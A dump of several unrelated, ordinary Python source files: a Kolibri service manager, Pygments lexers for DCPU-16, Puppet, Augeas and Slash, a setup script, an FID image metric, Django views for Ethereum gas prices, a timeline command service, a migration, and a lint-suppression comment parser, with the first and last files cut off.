import c_bool, c_char from .kolibri_service_main import KolibriServiceMainProcess from .kolibri_service_monitor import KolibriServiceMonitorProcess from .kolibri_service_setup import KolibriServiceSetupProcess from .kolibri_service_stop import KolibriServiceStopProcess class KolibriServiceContext(object): """ Common context passed to KolibriService processes. This includes events and shared values to facilitate communication. """ APP_KEY_LENGTH = 32 def __init__(self): self.__is_starting_value = multiprocessing.Value(c_bool) self.__is_starting_set_event = multiprocessing.Event() self.__is_stopped_value = multiprocessing.Value(c_bool) self.__is_stopped_set_event = multiprocessing.Event() self.__setup_result_value = multiprocessing.Value(c_bool) self.__setup_result_set_event = multiprocessing.Event() self.__is_responding_value = multiprocessing.Value(c_bool) self.__is_responding_set_event = multiprocessing.Event() self.__app_key_value = multiprocessing.Array(c_char, self.APP_KEY_LENGTH) self.__app_key_set_event = multiprocessing.Event() @property def is_starting(self): if self.__is_starting_set_event.is_set(): return self.__is_starting_value.value else: return None @is_starting.setter def is_starting(self, is_starting): self.__is_starting_value.value = is_starting if is_starting is None: self.__is_starting_set_event.clear() else: self.__is_starting_set_event.set() def await_is_starting(self): self.__is_starting_set_event.wait() return self.is_starting @property def is_stopped(self): if self.__is_stopped_set_event.is_set(): return self.__is_stopped_value.value else: return None @is_stopped.setter def is_stopped(self, is_stopped): self.__is_stopped_value.value = is_stopped if is_stopped is None: self.__is_stopped_set_event.clear() else: self.__is_stopped_set_event.set() def await_is_stopped(self): self.__is_stopped_set_event.wait() return self.is_stopped @property def setup_result(self): if self.__setup_result_set_event.is_set(): return self.__setup_result_value.value else: return None @setup_result.setter def setup_result(self, setup_result): self.__setup_result_value.value = setup_result if setup_result is None: self.__setup_result_set_event.clear() else: self.__setup_result_set_event.set() def await_setup_result(self): self.__setup_result_set_event.wait() return self.setup_result @property def is_responding(self): if self.__is_responding_set_event.is_set(): return self.__is_responding_value.value else: return None @is_responding.setter def is_responding(self, is_responding): self.__is_responding_value.value = is_responding if is_responding is None: self.__is_responding_set_event.clear() else: self.__is_responding_set_event.set() def await_is_responding(self): self.__is_responding_set_event.wait() return self.is_responding @property def app_key(self): if self.__app_key_set_event.is_set(): return self.__app_key_value.value.decode("ascii") else: return None @app_key.setter def app_key(self, app_key): self.__app_key_value.value = bytes(app_key, encoding="ascii") if app_key is None: self.__app_key_set_event.clear() else: self.__app_key_set_event.set() def await_app_key(self): self.__app_key_set_event.wait() return self.app_key class KolibriServiceManager(KolibriServiceContext): """ Manages the Kolibri service, starting and stopping it in separate processes, and checking for availability. """ APP_INITIALIZE_URL = "/app/api/initialize/{key}" def __init__(self): super().__init__() self.__main_process = KolibriServiceMainProcess(self) self.__monitor_process = KolibriServiceMonitorProcess(self) self.__setup_process = KolibriServiceSetupProcess(self) self.__stop_process = KolibriServiceStopProcess(self) def get_initialize_url(self, next_url=None): from ..kolibri_globals import KOLIBRI_BASE_URL app_key = self.await_app_key() url = self.APP_INITIALIZE_URL.format(key=app_key) if next_url: url += "?next={next_url}".format(next_url=next_url) return KOLIBRI_BASE_URL + url.lstrip("/") def get_kolibri_url(self, **kwargs): from urllib.parse import urljoin from urllib.parse import urlsplit from urllib.parse import urlunsplit from ..kolibri_globals import KOLIBRI_BASE_URL base_url = urlsplit(KOLIBRI_BASE_URL) if "path" in kwargs: kwargs["path"] = urljoin(base_url.path, kwargs["path"].lstrip("/")) target_url = base_url._replace(**kwargs) return urlunsplit(target_url) def is_kolibri_app_url(self, url): from ..kolibri_globals import KOLIBRI_BASE_URL if not url: return False elif not url.startswith(KOLIBRI_BASE_URL): return False elif url.startswith(KOLIBRI_BASE_URL + "static/"): return False elif url.startswith(KOLIBRI_BASE_URL + "downloadcontent/"): return False elif url.startswith(KOLIBRI_BASE_URL + "content/storage/"): return False else: return True def join(self): if self.__main_process.is_alive(): self.__main_process.join() if self.__monitor_process.is_alive(): self.__monitor_process.join() if self.__setup_process.is_alive(): self.__setup_process.join() if self.__stop_process.is_alive(): self.__stop_process.join() def start_kolibri(self): self.__setup_process.start() self.__main_process.start() self.__monitor_process.start() def stop_kolibri(self): self.__stop_process.start() <reponame>tony/django-docutils """ Based on custom lexers for GitHub.com :copyright: Copyright 2012 by GitHub, Inc :license: BSD, see LICENSE for details. """ from pygments.lexer import ( DelegatingLexer, ExtendedRegexLexer, RegexLexer, bygroups, include, ) from pygments.token import ( Comment, Keyword, Literal, Name, Number, Operator, Other, Punctuation, String, Text, Whitespace, ) __all__ = ['Dasm16Lexer', 'PuppetLexer', 'AugeasLexer', 'SlashLexer'] class Dasm16Lexer(RegexLexer): """ Simple lexer for DCPU-16 Assembly Check http://0x10c.com/doc/dcpu-16.txt """ name = 'dasm16' aliases = ['DASM16'] filenames = ['*.dasm16', '*.dasm'] mimetypes = ['text/x-dasm16'] INSTRUCTIONS = [ 'SET', 'ADD', 'SUB', 'MUL', 'MLI', 'DIV', 'DVI', 'MOD', 'MDI', 'AND', 'BOR', 'XOR', 'SHR', 'ASR', 'SHL', 'IFB', 'IFC', 'IFE', 'IFN', 'IFG', 'IFA', 'IFL', 'IFU', 'ADX', 'SBX', 'STI', 'STD', 'JSR', 'INT', 'IAG', 'IAS', 'RFI', 'IAQ', 'HWN', 'HWQ', 'HWI', ] REGISTERS = [ 'A', 'B', 'C', 'X', 'Y', 'Z', 'I', 'J', 'SP', 'PC', 'EX', 'POP', 'PEEK', 'PUSH', ] # Regexes yo char = r'[a-zA-Z$._0-9@]' identifier = r'(?:[a-zA-Z$_]' + char + r'*|\.' + char + '+)' number = r'[+-]?(?:0[xX][a-zA-Z0-9]+|\d+)' binary_number = r'0b[01_]+' instruction = r'(?i)(' + '|'.join(INSTRUCTIONS) + ')' single_char = r"'\\?" + char + "'" string = r'"(\\"|[^"])*"' def guess_identifier(lexer, match): ident = match.group(0) klass = Name.Variable if ident.upper() in lexer.REGISTERS else Name.Label yield match.start(), klass, ident tokens = { 'root': [ include('whitespace'), (':' + identifier, Name.Label), (identifier + ':', Name.Label), (instruction, Name.Function, 'instruction-args'), (r'\.' + identifier, Name.Function, 'data-args'), (r'[\r\n]+', Text), ], 'numeric': [ (binary_number, Number.Integer), (number, Number.Integer), (single_char, String), ], 'arg': [(identifier, guess_identifier), include('numeric')], 'deref': [ (r'\+', Punctuation), (r'\]', Punctuation, '#pop'), include('arg'), include('whitespace'), ], 'instruction-line': [ (r'[\r\n]+', Text, '#pop'), (r';.*?$', Comment, '#pop'), include('whitespace'), ], 'instruction-args': [ (r',', Punctuation), (r'\[', Punctuation, 'deref'), include('arg'), include('instruction-line'), ], 'data-args': [ (r',', Punctuation), include('numeric'), (string, String), include('instruction-line'), ], 'whitespace': [(r'\n', Text), (r'\s+', Text), (r';.*?\n', Comment)], } class PuppetLexer(RegexLexer): name = 'Puppet' aliases = ['puppet'] filenames = ['*.pp'] tokens = { 'root': [include('puppet')], 'puppet': [ include('comments'), ( r'(class)(\s*)(\{)', bygroups(Name.Class, Text, Punctuation), ('type', 'namevar'), ), (r'(class|define)', Keyword.Declaration, ('block', 'class_name')), (r'node', Keyword.Declaration, ('block', 'node_name')), (r'elsif', Keyword.Reserved, ('block', 'conditional')), (r'if', Keyword.Reserved, ('block', 'conditional')), (r'unless', Keyword.Reserved, ('block', 'conditional')), ( r'(else)(\s*)(\{)', bygroups(Keyword.Reserved, Text, Punctuation), 'block', ), (r'case', Keyword.Reserved, ('case', 'conditional')), ( r'(::)?([A-Z][\w:]+)+(\s*)(<{1,2}\|)', bygroups(Name.Class, Name.Class, Text, Punctuation), 'spaceinvader', ), ( r'(::)?([A-Z][\w:]+)+(\s*)(\{)', bygroups(Name.Class, Name.Class, Text, Punctuation), 'type', ), ( r'(::)?([A-Z][\w:]+)+(\s*)(\[)', bygroups(Name.Class, Name.Class, Text, Punctuation), ('type', 'override_name'), ), ( r'(@{0,2}[\w:]+)(\s*)(\{)(\s*)', bygroups(Name.Class, Text, Punctuation, Text), ('type', 'namevar'), ), (r'\$(::)?(\w+::)*\w+', Name.Variable, 'var_assign'), (r'(include|require)', Keyword.Namespace, 'include'), (r'import', Keyword.Namespace, 'import'), (r'(\w+)(\()', bygroups(Name.Function, Punctuation), 'function'), (r'\s', Text), ], 'block': [include('puppet'), (r'\}', Text, '#pop')], 'override_name': [ include('strings'), include('variables'), (r'\]', Punctuation), (r'\s', Text), (r'\{', Punctuation, '#pop'), ], 'node_name': [ (r'inherits', Keyword.Declaration), (r'[\w\.]+', String), include('strings'), include('variables'), (r',', Punctuation), (r'\s', Text), (r'\{', Punctuation, '#pop'), ], 'class_name': [ (r'inherits', Keyword.Declaration), (r'[\w:]+', Name.Class), (r'\s', Text), (r'\{', Punctuation, '#pop'), (r'\(', Punctuation, 'paramlist'), ], 'include': [ (r'\n', Text, '#pop'), (r'[\w:-]+', Name.Class), include('value'), (r'\s', Text), ], 'import': [ (r'\n', Text, '#pop'), (r'[\/\w\.]+', String), include('value'), (r'\s', Text), ], 'case': [ ( r'(default)(:)(\s*)(\{)', bygroups(Keyword.Reserved, Punctuation, Text, Punctuation), 'block', ), include('case_values'), (r'(:)(\s*)(\{)', bygroups(Punctuation, Text, Punctuation), 'block'), (r'\s', Text), (r'\}', Punctuation, '#pop'), ], 'case_values': [include('value'), (r',', Punctuation)], 'comments': [(r'\s*#.*\n', Comment.Singleline)], 'strings': [ (r"'.*?'", String.Single), (r'\w+', String.Symbol), (r'"', String.Double, 'dblstring'), (r'\/.+?\/', String.Regex), ], 'dblstring': [ (r'\$\{.+?\}', String.Interpol), ( r'(?:\\(?:[bdefnrstv\'"\$\\/]|[0-7][0-7]?[0-7]?|\^[a-zA-Z]))', String.Escape, ), (r'[^"\\\$]+', String.Double), (r'\$', String.Double), (r'"', String.Double, '#pop'), ], 'variables': [(r'\$(::)?(\w+::)*\w+', Name.Variable)], 'var_assign': [ (r'\[', Punctuation, ('#pop', 'array')), (r'\{', Punctuation, ('#pop', 'hash')), (r'(\s*)(=)(\s*)', bygroups(Text, Operator, Text)), (r'(\(|\))', Punctuation), include('operators'), include('value'), (r'\s', Text, '#pop'), ], 'booleans': [(r'(true|false)', Literal)], 'operators': [ ( r'(\s*)(==|=~|\*|-|\+|<<|>>|!=|!~|!|>=|<=|<|>|and|or|in)(\s*)', bygroups(Text, Operator, Text), ) ], 'conditional': [ include('operators'), include('strings'), include('variables'), (r'\[', Punctuation, 'array'), (r'\(', Punctuation, 'conditional'), (r'\{', Punctuation, '#pop'), (r'\)', Punctuation, '#pop'), (r'\s', Text), ], 'spaceinvader': [ include('operators'), include('strings'), include('variables'), (r'\[', Punctuation, 'array'), (r'\(', Punctuation, 'conditional'), (r'\s', Text), (r'\|>{1,2}', Punctuation, '#pop'), ], 'namevar': [ include('value'), (r'\[', Punctuation, 'array'), (r'\s', Text), (r':', Punctuation, '#pop'), (r'\}', Punctuation, '#pop'), ], 'function': [ (r'\[', Punctuation, 'array'), include('value'), (r',', Punctuation), (r'\s', Text), (r'\)', Punctuation, '#pop'), ], 'paramlist': [ include('value'), (r'=', Punctuation), (r',', Punctuation), (r'\s', Text), (r'\[', Punctuation, 'array'), (r'\)', Punctuation, '#pop'), ], 'type': [ ( r'(\w+)(\s*)(=>)(\s*)', bygroups(Name.Tag, Text, Punctuation, Text), 'param_value', ), (r'\}', Punctuation, '#pop'), (r'\s', Text), include('comments'), (r'', Text, 'namevar'), ], 'value': [ (r'[\d\.]', Number), (r'([A-Z][\w:]+)+(\[)', bygroups(Name.Class, Punctuation), 'array'), (r'(\w+)(\()', bygroups(Name.Function, Punctuation), 'function'), include('strings'), include('variables'), include('comments'), include('booleans'), ( r'(\s*)(\?)(\s*)(\{)', bygroups(Text, Punctuation, Text, Punctuation), 'selector', ), (r'\{', Punctuation, 'hash'), ], 'selector': [ (r'default', Keyword.Reserved), include('value'), (r'=>', Punctuation), (r',', Punctuation), (r'\s', Text), (r'\}', Punctuation, '#pop'), ], 'param_value': [ include('value'), (r'\[', Punctuation, 'array'), (r',', Punctuation, '#pop'), (r';', Punctuation, '#pop'), (r'\s', Text, '#pop'), (r'', Text, '#pop'), ], 'array': [ include('value'), (r'\[', Punctuation, 'array'), (r',', Punctuation), (r'\s', Text), (r'\]', Punctuation, '#pop'), ], 'hash': [ include('value'), (r'\s', Text), (r'=>', Punctuation), (r',', Punctuation), (r'\}', Punctuation, '#pop'), ], } class AugeasLexer(RegexLexer): name = 'Augeas' aliases = ['augeas'] filenames = ['*.aug'] tokens = { 'root': [ ( r'(module)(\s*)([^\s=]+)', bygroups(Keyword.Namespace, Text, Name.Namespace), ), ( r'(let)(\s*)([^\s=]+)', bygroups(Keyword.Declaration, Text, Name.Variable), ), ( r'(del|store|value|counter|seq|key|label|autoload|incl|' r'excl|transform|test|get|put)(\s+)', bygroups(Name.Builtin, Text), ), ( r'(\()([^\:]+)(\:)(unit|string|regexp|lens|tree|filter)(\))', bygroups( Punctuation, Name.Variable, Punctuation, Keyword.Type, Punctuation ), ), (r'\(\*', Comment.Multiline, 'comment'), (r'[\+=\|\.\*\;\?-]', Operator), (r'[\[\]\(\)\{\}]', Operator), (r'"', String.Double, 'string'), (r'\/', String.Regex, 'regex'), ( r'([A-Z]\w*)(\.)(\w+)', bygroups(Name.Namespace, Punctuation, Name.Variable), ), (r'.', Name.Variable), (r'\s', Text), ], 'string': [ (r'\\.', String.Escape), (r'[^"]', String.Double), (r'"', String.Double, '#pop'), ], 'regex': [ (r'\\.', String.Escape), (r'[^\/]', String.Regex), (r'\/', String.Regex, '#pop'), ], 'comment': [ (r'[^*\)]', Comment.Multiline), (r'\(\*', Comment.Multiline, '#push'), (r'\*\)', Comment.Multiline, '#pop'), (r'[\*\)]', Comment.Multiline), ], } class SlashLanguageLexer(ExtendedRegexLexer): _nkw = r'(?=[^a-zA-Z_0-9])' def move_state(new_state): return ('#pop', new_state) def right_angle_bracket(lexer, match, ctx): if len(ctx.stack) > 1 and ctx.stack[-2] == 'string': ctx.stack.pop() yield match.start(), String.Interpol, '}' ctx.pos = match.end() tokens = { 'root': [ (r'<%=', Comment.Preproc, move_state('slash')), (r'<%!!', Comment.Preproc, move_state('slash')), (r'<%#.*?%>', Comment.Multiline), (r'<%', Comment.Preproc, move_state('slash')), (r'.|\n', Other), ], 'string': [ (r'\\', String.Escape, move_state('string_e')), (r'\'', String, move_state('slash')), (r'#\{', String.Interpol, 'slash'), (r'.|\n', String), ], 'string_e': [ (r'n', String.Escape, move_state('string')), (r't', String.Escape, move_state('string')), (r'r', String.Escape, move_state('string')), (r'e', String.Escape, move_state('string')), (r'x[a-fA-F0-9]{2}', String.Escape, move_state('string')), (r'.', String.Escape, move_state('string')), ], 'regexp': [ (r'}[a-z]*', String.Regex, move_state('slash')), (r'\\(.|\n)', String.Regex), (r'{', String.Regex, 'regexp_r'), (r'.|\n', String.Regex), ], 'regexp_r': [ (r'}[a-z]*', String.Regex, '#pop'), (r'\\(.|\n)', String.Regex), (r'{', String.Regex, 'regexp_r'), ], 'slash': [ (r'%>', Comment.Preproc, move_state('root')), (r'\'', String, move_state('string')), (r"'[a-zA-Z0-9_]+", String), (r'%r{', String.Regex, move_state('regexp')), (r'/\*.*?\*/', Comment.Multiline), (r'(#|//).*?\n', Comment.Single), (r'-?[0-9]+e[+-]?[0-9]+', Number.Float), (r'-?[0-9]+\.[0-9]+(e[+-]?[0-9]+)?', Number.Float), (r'-?[0-9]+', Number.Integer), (r'nil' + _nkw, Name.Builtin), (r'true' + _nkw, Name.Builtin), (r'false' + _nkw, Name.Builtin), (r'self' + _nkw, Name.Builtin), ( r'(class)(\s+)([A-Z][a-zA-Z0-9_\']*)', bygroups(Keyword, Whitespace, Name.Class), ), (r'class' + _nkw, Keyword), (r'extends' + _nkw, Keyword), ( r'(def)(\s+)(self)(\s*)(\.)(\s*)([a-z_][a-zA-Z0-9_\']*=?|<<|>>|' r'==|<=>|<=|<|>=|>|\+|-(self)?|~(self)?|\*|/|%|^|&&|&|\||\[\]=?)', bygroups( Keyword, Whitespace, Name.Builtin, Whitespace, Punctuation, Whitespace, Name.Function, ), ), ( r'(def)(\s+)([a-z_][a-zA-Z0-9_\']*=?|<<|>>|==|<=>|<=|<|>=|>|\+|' r'-(self)?|~(self)?|\*|/|%|^|&&|&|\||\[\]=?)', bygroups(Keyword, Whitespace, Name.Function), ), (r'def' + _nkw, Keyword), (r'if' + _nkw, Keyword), (r'elsif' + _nkw, Keyword), (r'else' + _nkw, Keyword), (r'unless' + _nkw, Keyword), (r'for' + _nkw, Keyword), (r'in' + _nkw, Keyword), (r'while' + _nkw, Keyword), (r'until' + _nkw, Keyword), (r'and' + _nkw, Keyword), (r'or' + _nkw, Keyword), (r'not' + _nkw, Keyword), (r'lambda' + _nkw, Keyword), (r'try' + _nkw, Keyword), (r'catch' + _nkw, Keyword), (r'return' + _nkw, Keyword), (r'next' + _nkw, Keyword), (r'last' + _nkw, Keyword), (r'throw' + _nkw, Keyword), (r'use' + _nkw, Keyword), (r'switch' + _nkw, Keyword), (r'\\', Keyword), (r'λ', Keyword), (r'__FILE__' + _nkw, Name.Builtin.Pseudo), (r'__LINE__' + _nkw, Name.Builtin.Pseudo), (r'[A-Z][a-zA-Z0-9_\']*' + _nkw, Name.Constant), (r'[a-z_][a-zA-Z0-9_\']*' + _nkw, Name), (r'@[a-z_][a-zA-Z0-9_\']*' + _nkw, Name.Variable.Instance), (r'@@[a-z_][a-zA-Z0-9_\']*' + _nkw, Name.Variable.Class), (r'\(', Punctuation), (r'\)', Punctuation), (r'\[', Punctuation), (r'\]', Punctuation), (r'\{', Punctuation), (r'\}', right_angle_bracket), (r';', Punctuation), (r',', Punctuation), (r'<<=', Operator), (r'>>=', Operator), (r'<<', Operator), (r'>>', Operator), (r'==', Operator), (r'!=', Operator), (r'=>', Operator), (r'=', Operator), (r'<=>', Operator), (r'<=', Operator), (r'>=', Operator), (r'<', Operator), (r'>', Operator), (r'\+\+', Operator), (r'\+=', Operator), (r'-=', Operator), (r'\*\*=', Operator), (r'\*=', Operator), (r'\*\*', Operator), (r'\*', Operator), (r'/=', Operator), (r'\+', Operator), (r'-', Operator), (r'/', Operator), (r'%=', Operator), (r'%', Operator), (r'^=', Operator), (r'&&=', Operator), (r'&=', Operator), (r'&&', Operator), (r'&', Operator), (r'\|\|=', Operator), (r'\|=', Operator), (r'\|\|', Operator), (r'\|', Operator), (r'!', Operator), (r'\.\.\.', Operator), (r'\.\.', Operator), (r'\.', Operator), (r'::', Operator), (r':', Operator), (r'(\s|\n)+', Whitespace), (r'[a-z_][a-zA-Z0-9_\']*', Name.Variable), ], } class SlashLexer(DelegatingLexer): """ Lexer for the Slash programming language. """ name = 'Slash' aliases = ['slash'] filenames = ['*.sl'] def __init__(self, **options): from pygments.lexers.web import HtmlLexer super().__init__(HtmlLexer, SlashLanguageLexer, **options) #!/usr/bin/env python from distutils.core import setup setup(name = "quasi", version = "0.87", description = "A multiple-context Python shell", author = "<NAME>", author_email = "<EMAIL>", url = "http://quasi-shell.sourceforge.net/", license = "BSD", scripts = ["quasi.py"], data_files = [("share/licenses/quasi", ["LICENSE"])], extra_path = "quasi", packages = ["."] ) import torch from . import model from .metric import MultiImageMetric, Union, List from . import utils import torch.nn.functional as F import numpy as np __all__ = ['FID'] class FID(MultiImageMetric): def __init__(self, input_type, eps=1e-6) -> None: super().__init__() if input_type not in ['image', 'feature']: msg = 'input_type should be image or feature, but got {}'.format( input_type) raise ValueError(msg) self.input_type = input_type self.eps = eps if input_type == 'image': self.inception = model.fid.InceptionV3() self.inception.eval() def calc( self, images_a: Union[torch.Tensor, List[torch.Tensor]], images_b: Union[torch.Tensor, List[torch.Tensor]]) -> torch.Tensor: if self.input_type == 'feature': features_a = images_a features_b = images_b else: features_a = self.calc_feature(images_a) features_b = self.calc_feature(images_b) mu_a = torch.mean(features_a, dim=0) mu_b = torch.mean(features_b, dim=0) sigma_a = torch.cov(features_a.t()) sigma_b = torch.cov(features_b.t()) diff_mu = mu_a - mu_b covmean, error = utils.sqrtm_newton_schulz(sigma_a.mm(sigma_b), num_iters=100) if not torch.isfinite(covmean).all(): offset = utils.to_device( torch.eye(sigma_a.size(0), dtype=sigma_a.dtype) * self.eps, utils.get_device(sigma_a)) covmean, error = utils.sqrtm_newton_schulz( (sigma_a + offset).mm(sigma_b + offset), num_iters=100) fid = diff_mu.dot(diff_mu) + torch.trace(sigma_a + sigma_b - 2 * covmean) return fid def calc_feature(self, images: Union[torch.Tensor, List[torch.Tensor]]): if not hasattr(self, 'inception'): self.inception = model.fid.InceptionV3() self.inception.eval() images = [ F.interpolate(image.unsqueeze(0), size=(299, 299), mode='bilinear', align_corners=False) for image in images ] images = torch.cat(images, dim=0) images = 2 * images - 1 features = self.inception(images)[0].squeeze(2).squeeze(2) return features import datetime from django.utils import timezone from django.utils.dateparse import parse_datetime from drf_yasg import openapi from drf_yasg.utils import swagger_auto_schema from rest_framework.generics import ListAPIView from rest_framework.pagination import LimitOffsetPagination from rest_framework.response import Response from rest_framework.views import APIView from .gas_station import GasStationProvider from .models import GasPrice from .serializers import GasPriceSerializer class DefaultPagination(LimitOffsetPagination): max_limit = 500 default_limit = 500 class GasStationView(APIView): @swagger_auto_schema(responses={200: GasPriceSerializer()}) def get(self, request, format=None): """ Gets current gas prices for the ethereum network (using last 200 blocks) `Lowest` and `fastest` are the lower and the higher gas prices found in those blocks The rest are percentiles on all the gas prices in the last blocks. `safe_low=percentile 30`, `standard=percentile 50` and `fast=percentile 75` """ gas_station = GasStationProvider() gas_prices = gas_station.get_gas_prices() serializer = GasPriceSerializer(gas_prices) return Response(serializer.data, headers={"Cache-Control": f"max-age={60 * 4}"}) class GasStationHistoryView(ListAPIView): serializer_class = GasPriceSerializer pagination_class = DefaultPagination def get_queryset(self): from_date = self.request.query_params.get("fromDate") to_date = self.request.query_params.get("toDate") from_date = ( parse_datetime(from_date) if from_date else timezone.now() - datetime.timedelta(days=30) ) to_date = parse_datetime(to_date) if to_date else timezone.now() return GasPrice.objects.filter(created__range=[from_date, to_date]).order_by( "created" ) @swagger_auto_schema( manual_parameters=[ openapi.Parameter( "fromDate", openapi.IN_QUERY, type=openapi.TYPE_STRING, format="date-time", description="ISO 8601 date to filter stats from. If not set, 1 month before now", ), openapi.Parameter( "toDate", openapi.IN_QUERY, type=openapi.TYPE_STRING, format="date-time", description="ISO 8601 date to filter stats to. If not set, now", ), ] ) def get(self, request, *args, **kwargs): return super().get(request, *args, **kwargs) <filename>src/application/commands_service.py import logging from src.domain.messages.message import Message from src.domain.users.user import User from src.domain.messages.message import Message def post(repo, username: str, message: str): res = False logging.debug(f"[+] {username} user is posting: {message}.") user = User.from_dict(repo.get_user(username = username)) if user: message = Message(content = message, user_id = user.id) res = repo.insert_message(message= message.to_dict()) else: raise Exception(f"{username} user not found") return res def read(repo, username: str): res = None logging.debug(f"[+] Reading {username}'s timeline") user = User.from_dict(repo.get_user(username = username)) if user: res = repo.get_messages(user_ids = [user.id]) username = { user.id: user.username } Message.print_messages(messages = res, usernames = username) else: raise Exception(f"{username} user not found") return res def follow(repo, username: str, follow_username: str): res = False logging.debug(f"[+] User {username} wants to follow user {follow_username}.") user = User.from_dict(repo.get_user(username = username)) follow_user = User.from_dict(repo.get_user(username = follow_username)) if user: if follow_user: user.add_follow(follow_user.id) res = repo.update_user(user = user.to_dict()) else: raise Exception(f"{follow_username} user to follow not found") else: raise Exception(f"{username} user not found") return res def wall(repo, username: str): res = None logging.debug(f"[+] Reading user {username} wall.") user = User.from_dict(repo.get_user(username = username)) if user: ids = [user.id] # Username is a dict key-value (id-username) usernames = { user.id: user.username } if user.follows and isinstance(user.follows, list): ids.extend(user.follows) for f in user.follows: usernames.update({ f: repo.get_user_by_id(f).get('username') }) res = repo.get_messages(user_ids = ids) Message.print_messages(messages = res, usernames = usernames) else: raise Exception(f"{username} user not found") return res<filename>neighbourhood/migrations/0008_auto_20220110_2206.py<gh_stars>0 # Generated by Django 3.2.9 on 2022-01-10 19:06 from django.conf import settings from django.db import migrations, models import django.db.models.deletion class Migration(migrations.Migration): dependencies = [ migrations.swappable_dependency(settings.AUTH_USER_MODEL), ('neighbourhood', '0007_alter_profile_user'), ] operations = [ migrations.AddField( model_name='profile', name='created_at', field=models.DateTimeField(auto_now_add=True, null=True), ), migrations.AlterField( model_name='profile', name='bio', field=models.TextField(max_length=1000, null=True), ), migrations.AlterField( model_name='profile', name='user', field=models.OneToOneField(null=True, on_delete=django.db.models.deletion.CASCADE, related_name='profile', to=settings.AUTH_USER_MODEL), ), ] <filename>src/mam/_mam/tasks/mutations/nosa.py<gh_stars>0 """Handle nosa comments.""" from __future__ import annotations import itertools import logging import operator import re import tokenize from typing import Any, Iterator, List, Optional, Tuple from ...core.objects import Format, LESS, Less, Message # nosa(2): pylint[C0103] _get_path = operator.attrgetter('path') logger = logging.getLogger(__name__) class Position: """Position states.""" PREV = object() NEXT = object() NEXT_ORIG = object() class Scope: """Scope states.""" COMMENT = object() DEFINITION = object() EMPTY_LINE = object() SCOPE_TO_POSITION = { Scope.COMMENT: Position.NEXT, Scope.DEFINITION: Position.NEXT, Scope.EMPTY_LINE: Position.NEXT_ORIG, } TokenPosition = Tuple[int, tokenize.TokenInfo] Scoped = Tuple[object, List[tokenize.TokenInfo]] def _convert_scope(queue: List[Scoped], comment_global: bool = True, ) -> Iterator[Scoped]: """Convert from Scope to Position.""" for i, (type_, values) in enumerate(queue): if (comment_global and type_ is Scope.COMMENT and any(Scope.DEFINITION == t for t, _ in queue[i:]) ): yield Position.NEXT_ORIG, values else: yield SCOPE_TO_POSITION[type_], values def handle_queue(queue: List[Scoped], scope: int, prev: int, prev_orig: int, ) -> Iterator[TokenPosition]: """Handle queue.""" place = { Position.PREV: prev, Position.NEXT: scope, Position.NEXT_ORIG: prev_orig, } for position, values in _convert_scope(queue): pos = place[position] for value in values: yield (pos, value) # TODO: fix scopes def _with_scope(tokens: Iterator[tokenize.TokenInfo], ) -> Iterator[TokenPosition]: """Add scope to tokens.""" queue: List[Scoped] = [] prev = 1 prev_orig = 1 for line, values in itertools.groupby(tokens, lambda i: i.line): striped_line = line.lstrip(' ') if striped_line.startswith('#'): queue.append((Scope.COMMENT, list(values))) elif not line.strip(): queue.append((Scope.EMPTY_LINE, list(values))) elif (striped_line.startswith('def') or striped_line.startswith('class') ): queue.append((Scope.DEFINITION, list(values))) prev_orig = len(line) - len(striped_line) + 1 else: scope = len(line) - len(striped_line) + 1 yield from handle_queue(queue, scope, prev, prev_orig) for value in values: yield (scope, value) queue = [] prev = prev_orig = scope if queue: yield from handle_queue(queue, 1, prev, prev_orig) TOKEN_EMPTY = { tokenize.NEWLINE, tokenize.NL, tokenize.DEDENT, tokenize.INDENT, } TScope = Tuple[int, List] # nosa: flake8-annotations-complexity[TAE002] def _find_nosa(path: str) -> Iterator[Tuple[str, bool, int, Tuple[int, int]]]: """Find NOSA in path.""" if path is LESS: return # Test scopes: List[TScope] = [(-1, [])] line_no = 0 with open(path, 'rb') as file: prev = None tokens = _with_scope(tokenize.tokenize(file.readline)) for spaces, (token_type, value, (line_no, _), _, _) in tokens: if spaces > len(scopes): for _ in range(spaces - len(scopes)): scopes.append((line_no, [])) elif spaces < len(scopes): for beginning, scope in scopes[spaces:]: for nosa, nosa_type, location in scope: yield nosa, nosa_type, location, (beginning, line_no) del scopes[spaces:] if token_type == tokenize.COMMENT: nosa_type = prev in TOKEN_EMPTY scopes[-1][1].append((value, nosa_type, line_no)) else: prev = token_type for beginning, scope in scopes: for nosa, nosa_type, location in scope: yield nosa, nosa_type, location, (beginning, line_no) class ErrorValue: """NOSA error values.""" def __init__(self, code: str, message: str) -> None: """Initialize ErrorValue.""" self.code = code self.message = message def __str__(self) -> str: """Convert into string form.""" output = str(self.code) if self.message: output += ':' + self.message return output def __contains__(self, item: Message): """Check item contains the code and/or message.""" if self.code and not isinstance(item.code, Less): if not item.code.startswith(self.code): return False if self.message and not isinstance(item.message, Less): if self.message not in item.message: return False return True @classmethod def from_string(cls, value: str) -> ErrorValue: """Build from string form.""" code, message, *_ = value.split(':') + [''] return cls(code, message) class Error: """Contain program and values of NOSA comments.""" def __init__(self, programs: List[str], values: List[ErrorValue]) -> None: """Initialize Error.""" self.programs = programs self.values = values def __str__(self) -> str: """Convert into non-ambiguous string form.""" programs = ','.join(self.programs) programs = f'({programs})' values = ','.join(str(v) for v in self.values) values = f'[{values}]' return programs + values def __contains__(self, item: Message): """Check if item is applicable program with value.""" if self.programs and item.app is not LESS: if item.app not in self.programs: return False if self.values: if not any(item in value for value in self.values): return False return True @classmethod def from_string(cls, error: str) -> Error: """Build from string form.""" start, end, *_ = error.split('[', 1) + [''] if start.startswith('('): start = start[1:-1] elif not end: end = start + ']' start = '' if start: start_ = start.split(',') else: start_ = [] if end: end = end[:-1] return cls( start_, [ ErrorValue.from_string(e) for e in end.split(',') ], ) class State: """Error parsing states.""" GLOBAL = object() BRACKET = object() class Errors: """Errors holder.""" def __init__(self, errors: List[Error]) -> None: """Initialize Errors.""" self.errors = errors def __str__(self): """Convert to string form.""" return ','.join(str(e) for e in self.errors) def __contains__(self, item: Message): """Check if contains error.""" return any(item in error for error in self.errors) def __len__(self): """Amount of errors.""" return len(self.errors) @staticmethod def _split_top_level_errors(errors): """Split sub-errors.""" if errors is None: return [] split_errors = [] name = [] state = State.GLOBAL for char in errors: if char in ' ' and state is State.GLOBAL: break elif char in '([': name.append(char) state = State.BRACKET elif char in '])': name.append(char) state = State.GLOBAL elif char == ',' and state is State.GLOBAL: split_errors.append(''.join(name)) name = [] else: name.append(char) if name: split_errors.append(''.join(name)) return split_errors @classmethod def from_string(cls, errors: str) -> Errors: """Build Errors from string form.""" return cls([ Error.from_string(error) for error in cls._split_top_level_errors(errors) ]) class 